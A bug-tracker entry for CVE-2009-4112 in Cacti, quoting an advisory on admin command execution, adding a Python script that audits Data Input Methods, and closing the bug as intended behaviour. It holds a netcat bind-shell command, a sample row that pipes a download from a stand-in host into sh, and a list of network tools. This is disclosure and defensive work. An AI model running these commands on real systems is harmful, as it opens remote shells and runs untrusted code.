Bug 542985 (CVE-2009-4112)

Summary: CVE-2009-4112 Cacti: Privilege escalation under certain conditions
Product: [Other] Security Response
Reporter: Jan Lieskovsky <jlieskov>
Component: vulnerability
Assignee: Red Hat Product Security <security-response-team>
Status: CLOSED NOTABUG
Severity: low
Priority: low
Version: unspecified
CC: mmcgrath
Target Milestone: ---
Keywords: Security
Target Release: ---
Hardware: All
OS: Linux
URL: http://archives.neohapsis.com/archives/fulldisclosure/2009-11/0292.html
Doc Type: Bug Fix
Last Closed: 2010-06-29 08:11:41 UTC

Description Jan Lieskovsky 2009-12-01 11:54:09 UTC
Common Vulnerabilities and Exposures assigned an identifier CVE-2009-4112
to the following vulnerability:

Cacti 0.8.7e and earlier allows remote authenticated administrators to
gain privileges by modifying the "Data Input Method" for the "Linux -
Get Memory Usage" setting to contain arbitrary commands.

References:
-----------
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4112
http://archives.neohapsis.com/archives/fulldisclosure/2009-11/0292.html
http://www.securityfocus.com/bid/37137

More issue details from the full-disclosure post by Moritz Naumann:
-------------------------------------------------------------------

5. Privilege escalation

Finally, due to the permissive way the web interface allows
Cacti to be configured, a cacti administrator is also able
to execute arbitrary commands on the system as the user the
Cacti polling mechanism runs as (usually a non-privileged user).

For example, it is possible to successfully spawn (and connect to)
a backdoor/remote shell on the Cacti system by changing the "Data
Input Method" for "Linux - Get Memory Usage". Setting "Input String"
to

  nohup nc -l -p 6666 -n -e /bin/sh &

would spawn a remotely accessible shell whenever this handler was
called (every couple of minutes by default on my Debian test system).

Cacti developers say:
> There is no effective way to fix the data input method without
> breaking Cacti. It will be reviewed for the release of 0.8.8.

Upstream patch:
---------------
No upstream patch yet.
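Because upstream treats command-type Data Input Methods as an intended administrator capability, the practical control is to audit them for drift. The following is an added example written for this bug entry, not code from Cacti, the reporter, or the advisory: it walks a set of Data Input Method rows, compares each against a known-good baseline exported from a clean install, and flags input strings that contain shell control operators or reach for network/backgrounding tools. The row fields `name` and `input_string` are assumed to mirror Cacti's data_input table columns, and both the sample rows and the baseline values are constructed for this example (the tampered row reuses the command quoted in the advisory above).

```python
import re
import shlex
from typing import Dict, List, Tuple

# Constructed sample rows modelled on Cacti's data_input table. The column
# names (name, input_string) are an assumption; the data is made up for this
# example. Row 3 is a tampered copy of row 1 using the advisory's command.
SAMPLE_ROWS = [
    {"id": 1, "name": "Linux - Get Memory Usage",
     "input_string": "perl <path_cacti>/scripts/linux_memory.pl <grepstr>"},
    {"id": 2, "name": "Unix - Get Load Average",
     "input_string": "perl <path_cacti>/scripts/loadavg_multi.pl"},
    {"id": 3, "name": "Linux - Get Memory Usage",
     "input_string": "nohup nc -l -p 6666 -n -e /bin/sh &"},
    {"id": 4, "name": "Custom - Disk Check",
     "input_string": "<path_cacti>/scripts/disk.sh; curl http://example.invalid/x | sh"},
]

# Known-good baseline, e.g. exported from a freshly installed Cacti and stored
# outside the Cacti database so a web-interface change cannot also rewrite it.
# Values are constructed for this example.
BASELINE: Dict[str, str] = {
    "Linux - Get Memory Usage": "perl <path_cacti>/scripts/linux_memory.pl <grepstr>",
    "Unix - Get Load Average": "perl <path_cacti>/scripts/loadavg_multi.pl",
}

# Shell constructs a poller script invocation should never need:
# command separators, pipes, backgrounding, command substitution, /dev/tcp-style redirects.
SHELL_CONTROL = re.compile(r"[;&|`]|\$\(|>\s*/dev/")

# Tools commonly seen when an input string has been repurposed to open a
# listener or fetch and run remote content.
SUSPICIOUS_BINARIES = {"nc", "ncat", "netcat", "socat", "telnet", "nohup", "curl", "wget"}


def classify(input_string: str) -> List[str]:
    """Return the reasons an input string looks suspicious; empty list if clean."""
    reasons: List[str] = []
    if SHELL_CONTROL.search(input_string):
        reasons.append("shell control operator")
    try:
        tokens = shlex.split(input_string)
    except ValueError:
        # Unbalanced quotes: the poller would still hand this to a shell, so review it.
        return reasons + ["unparseable quoting"]
    for tok in tokens:
        base = tok.rsplit("/", 1)[-1]  # compare on the basename, e.g. /usr/bin/nc -> nc
        if base in SUSPICIOUS_BINARIES:
            reasons.append(f"suspicious binary: {base}")
            break
    # Shipped command-type methods reference Cacti's own scripts directory via
    # the <path_cacti> placeholder; anything else deserves a human look.
    if "<path_cacti>" not in input_string:
        reasons.append("does not reference <path_cacti>")
    return reasons


def audit(rows, baseline: Dict[str, str]) -> List[Tuple[int, str, List[str]]]:
    """Flag rows that differ from the baseline or match the heuristics in classify()."""
    findings = []
    for row in rows:
        reasons = classify(row["input_string"])
        expected = baseline.get(row["name"])
        if expected is None:
            reasons.append("not in baseline")
        elif expected != row["input_string"]:
            reasons.append("differs from baseline")
        if reasons:
            findings.append((row["id"], row["name"], reasons))
    return findings


if __name__ == "__main__":
    for row_id, name, reasons in audit(SAMPLE_ROWS, BASELINE):
        print(f"data_input id={row_id} {name!r}: {', '.join(reasons)}")
```

Run against a live instance, the rows would come from a read-only query of the poller database and the findings would feed whatever alerting the monitoring host already uses; the baseline comparison catches a changed command even when it avoids every heuristic, while the heuristics catch new methods that were never in the baseline.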

Comment 1 Mike McGrath 2009-12-02 18:20:28 UTC
What version of nc has a valid -e?

Comment 2 Tomas Hoger 2010-06-29 08:11:41 UTC
(In reply to comment #1)
> What version of nc has a valid -e?

Some Debian version, or nmap's netcat implementation - ncat.

However, I'm closing this bug.  It is expected that a Cacti administrator is able to define new Data Input Methods, which can be either an SNMP query or a command that is run with the privileges of the cacti user.  So this "flaw" does not bypass any intended restriction.  It seems upstream has no intention to add additional restrictions on Data Input Method commands in the maintenance releases for the current Cacti version.